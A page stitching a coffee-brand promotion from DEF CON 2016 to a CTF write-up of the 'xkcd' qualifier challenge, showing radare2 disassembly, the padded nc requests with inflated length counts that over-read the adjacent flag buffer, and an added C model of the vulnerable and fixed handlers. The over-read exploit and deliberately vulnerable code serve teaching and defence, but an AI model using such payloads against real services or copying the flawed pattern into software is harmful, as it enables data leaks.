@jollieyasmin
@sugarcuttom
At this year’s Black Hat & Def Con there were a few firsts for me, and it was probably one of the best experiences I’ve had at these…
Short blog post on my bhusa2016 & defcon2016 experience
Melissa Archer 'Cray' and her good friend 'Shznakl' went to DEFCON to promote Hacker's Brew. Hacker's Brew is a cold brew coffee made with superfood ingredients that calms the mind and boosts energy and focus to help individuals get stuff done. Over the course of the weekend they were able to spread the word widely about this awesome new brand of cold brew by promoting it at targeted hacking conferences such as DEFCON, as well as through their social pages on Facebook, Twitter and Instagram. Hacker's Brew is highly recommended. 'Nikias Bassen' wrote via Twitter: "Thanks for the treat HackersBrew!" 'Kim Brown' wrote via Twitter: "Check out HackersBrew yummy just look at Landon's face duosec #defcon2016" 'Landon Greer' wrote via Twitter: "Thanks for the energy boost! HackersBrew" 'Justin Williams' wrote via Twitter: "Just landed in DEN. Can't forget to say thanks to MelissaArcher for the delicious HackersBrew!! #defcon" and 'Antriksh' wrote via Twitter: "I love your stuff HackersBrew, do let us know when you start shipping it outside of the US. Great #coffee" Hacker's Brew ended the event via Twitter writing: "Annnnnd the last #DEFCON bottle of brew goes to?! hackthethings Street team killing it! @_melissaarcher @shznakl" For more info on Hacker's Brew the cold brew go to HackersBrew.com #DEFCON2016
xkcd writeup (DEFCON CTF 2016 QUAL)
xkcd
xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me:1354
Might want to read that comic as well... 1354
First, the usual checks.
$~/defcon2016/xkcd# file xkcd
xkcd: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, not stripped
$~/defcon2016/xkcd# checksec.sh --file xkcd
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   xkcd
No PIE, which helps. With NX enabled, a shellcode-style approach is unlikely. Well, let's just run it.
$~/defcon2016/xkcd# ./xkcd
Could not open the flag.
$~/defcon2016/xkcd# echo foobar > flag
$~/defcon2016/xkcd# ./xkcd
foobar
MALFORMED REQUEST
It says it cannot open a file. Creating a file called flag on a whim made it get past that. But the input apparently did not match the expected protocol, so the request was rejected. So let's disassemble the binary and look for that protocol. This time I'll try radare2.
$~/defcon2016/xkcd# r2 ./xkcd
[0x00400e3e]> aa
[0x00400e3e]> pdf@main
/ (fcn) fcn.00400f5e 537
...
|           0x00400fb9    bee47d4800     mov esi, 0x487de4
|           0x00400fbe    bfe67d4800     mov edi, str.flag
|           0x00400fc3    e8b86d0000     call sym.fopen64
|              sym.fopen64() ; sym._IO_fopen64
|           0x00400fc8    488945e8       mov [rbp-0x18], rax
|           0x00400fcc    48837de800     cmp qword [rbp-0x18], 0x0
|       ,=< 0x00400fd1    7514           jnz 0x400fe7
|       |   0x00400fd3    bfeb7d4800     mov edi, 0x487deb
|       |   0x00400fd8    e883720000     call sym._IO_puts
|       |      sym._IO_puts() ; sym.puts
|       |   0x00400fdd    b8ffffffff     mov eax, 0xffffffff
|      ,==< 0x00400fe2    e990010000     jmp fcn.00401177
|      |`-> 0x00400fe7    488b45e8       mov rax, [rbp-0x18]
|      |    0x00400feb    4889c1         mov rcx, rax
|      |    0x00400fee    ba00010000     mov edx, 0x100
|      |    0x00400ff3    be01000000     mov esi, 0x1
|      |    0x00400ff8    bf40756b00     mov edi, 0x6b7540
|      |    0x00400ffd    e88e6d0000     call sym.fread
|      |       sym.fread() ; sym._IO_fread
...
[0x00400e3e]> ps @0x487de6
flag
[0x00400e3e]> ps @0x487deb
Could not open the flag.
Around 0x00400fbe and 0x00400fc3 it opens the file "flag" and reads it into 0x6b7540. So the goal is presumably to find a way to read that memory. Next, let's keep investigating what the protocol is.
[0x00400e3e]> pdf@main~strtok
|  |           fcn.004196a0() ; sym.strtok
|  |           fcn.004196a0() ; sym.strtok
|  |           fcn.004196a0() ; sym.strtok
|  |           fcn.004196a0() ; sym.strtok
|  |           fcn.004196a0() ; sym.strtok
Judging from this part, the input is apparently split on particular delimiter characters, so I decided to investigate bit by bit with a debugger. Setting breakpoints around the strtok calls and stepping through, the protocol turned out to be the following.
SERVER, ARE YOU STILL THERE? IF SO, REPLY "string to display" ([number of characters] LETTERS)
Actually sending something with this protocol gives the following.
$~/defcon2016/xkcd# ./xkcd
SERVER, ARE YOU STILL THERE? IF SO, REPLY "foobar" (6 LETTERS)
foobar
...
$~/defcon2016/xkcd# ./xkcd
SERVER, ARE YOU STILL THERE? IF SO, REPLY "foobar" (10 LETTERS)
NICE TRY
When the "string to display" is given following the proper protocol, the program echoes it back. Also, when the "number of characters" is greater than the length of the "string to display", it prints "NICE TRY". Let's disassemble this area and take a closer look.
|  |        0x004010db    bf40736b00     mov edi, sym.globals
|  |        0x004010e0    e8fbeb0100     call fcn.0041fce0
|  |           fcn.0041fce0() ; sym.memcpy
...
[0x00400e3e]> is~globals
addr=0x006b7340 off=0x002b7340 ord=1807 fwd=NONE sz=768 bind=GLOBAL type=OBJECT name=globals
...
|  |        0x00401145    bf40736b00     mov edi, sym.globals
|  |        0x0040114a    e831610100     call sym.strlen
|  |           sym.strlen()
|  |        0x0040114f    4839c3         cmp rbx, rax
|  | ,=====< 0x00401152    7614           jbe 0x401168
|  | |      0x00401154    bf547e4800     mov edi, str.NICETRY
|  | |      0x00401159    e802710000     call sym._IO_puts
|  | |         sym._IO_puts() ; sym.puts
|  | |      0x0040115e    bfffffffff     mov edi, 0xffffffff
|  | |      0x00401163    e8d85a0000     call sym.exit
|  | |         sym.exit()
|  | `-----> 0x00401168    bf40736b00     mov edi, sym.globals
|  |        0x0040116d    e8ee700000     call sym._IO_puts
|  |           sym._IO_puts() ; sym.puts
First, focusing on how the "string to display" is handled: it is stored with memcpy into sym.globals, i.e. 0x6b7340 (the call's arguments got cut off in the output, though). Then the return value of strlen on that buffer is compared with the "number of characters" given in the protocol, and the "string to display" is printed. Hmm? If I remember right, the memory the flag was read into earlier was 0x6b7540. The memory I can control is at 0x6b7340, so if I fill the 512-byte gap between them, it should look like one long string, since memcpy is used. Then giving a "number of characters" larger than 512 should get me the flag.
$:~/defcon2016/xkcd# nc xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me 1354 SERVER, ARE YOU STILL THERE? IF SO, REPLY "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" (515 LETTERS) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaThe
Right, what I was aiming for came out. Now I just need to adjust the length.
$~/defcon2016/xkcd# nc xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me 1354 SERVER, ARE YOU STILL THERE? IF SO, REPLY "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" (542 LETTERS) NICE TRY $~/defcon2016/xkcd# nc xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me 1354 SERVER, ARE YOU STILL THERE? IF SO, REPLY "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" (541 LETTERS) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaThe flag is: bl33ding h34rt5
The flag is: bl33ding h34rt5
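The over-read the analysis above describes, modelled as an added C example (not the challenge binary's own code): a 768-byte globals buffer with the flag at offset 512, a handler that copies the reply with memcpy and checks the claimed count only against strlen, and a hardened handler beside it. The exact control flow of the binary, the placeholder flag text and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>
/* Layout from the writeup: 768-byte globals (sz=768), flag read in at
 * offset 512 (0x6b7540 - 0x6b7340). Flag text is a constructed placeholder. */
#define GLOBALS_SZ 768
#define FLAG_OFF   512
static const char demo_flag[] = "The flag is: <placeholder>";
/* Vulnerable handler (assumed model of the binary): reply is memcpy'd with no
 * terminator, so strlen(globals) runs through a 512-byte reply into the flag. */
int handle_vuln(const char *reply, size_t reply_len, size_t claimed,
                char *out, size_t out_sz)
{
    char globals[GLOBALS_SZ] = {0};
    memcpy(globals + FLAG_OFF, demo_flag, sizeof demo_flag);
    if (reply_len > FLAG_OFF || claimed >= out_sz) return -1;
    memcpy(globals, reply, reply_len);            /* no NUL written */
    if (claimed > strlen(globals)) return -1;     /* "NICE TRY" */
    memcpy(out, globals, claimed);                /* echoes flag bytes too */
    out[claimed] = '\0';
    return 0;
}

/* Hardened handler: echo length is bounded by the bytes actually received. */
int handle_fixed(const char *reply, size_t reply_len, size_t claimed,
                 char *out, size_t out_sz)
{
    if (claimed > reply_len || claimed >= out_sz) return -1;
    memcpy(out, reply, claimed);
    out[claimed] = '\0';
    return 0;
}

/* Send pad_len 'a's with a claimed count; -1 if rejected, else flag bytes echoed. */
int leaked_bytes(int use_fixed, size_t pad_len, size_t claimed)
{
    static char reply[GLOBALS_SZ], out[GLOBALS_SZ + 1];
    memset(reply, 'a', pad_len);
    int rc = use_fixed ? handle_fixed(reply, pad_len, claimed, out, sizeof out)
                       : handle_vuln(reply, pad_len, claimed, out, sizeof out);
    if (rc != 0) return -1;
    size_t n = strlen(out);
    return n > FLAG_OFF ? (int)(n - FLAG_OFF) : 0;
}

int main(void)
{
    printf("vulnerable: %d flag bytes leaked, fixed: %d\n",
           leaked_bytes(0, 512, 515), leaked_bytes(1, 512, 515));
    return 0;
}
```

With a 512-byte reply and 515 claimed letters the vulnerable handler echoes three flag bytes (the "The" seen in the transcript above), while the hardened handler rejects the request because the claim exceeds what was received.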